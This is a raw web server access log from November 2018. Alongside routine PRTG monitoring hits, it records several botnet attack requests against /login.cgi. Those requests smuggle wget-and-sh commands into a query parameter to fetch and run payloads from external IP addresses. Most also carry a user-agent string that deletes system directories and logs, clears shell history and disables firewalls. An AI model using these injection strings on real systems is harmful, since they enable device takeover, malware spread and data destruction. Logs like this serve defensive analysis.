80.13.60.187 - - [01/Nov/2018:23:00:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.212.89.128 - - [01/Nov/2018:23:01:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:23:01:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.196.212.21 - - [01/Nov/2018:23:01:25 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:23:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:23:03:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:23:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:23:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.184.8.165 - - [01/Nov/2018:23:05:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
219.36.148.6 - - [01/Nov/2018:23:06:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:23:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:23:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.44.227.1 - - [01/Nov/2018:23:07:34 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
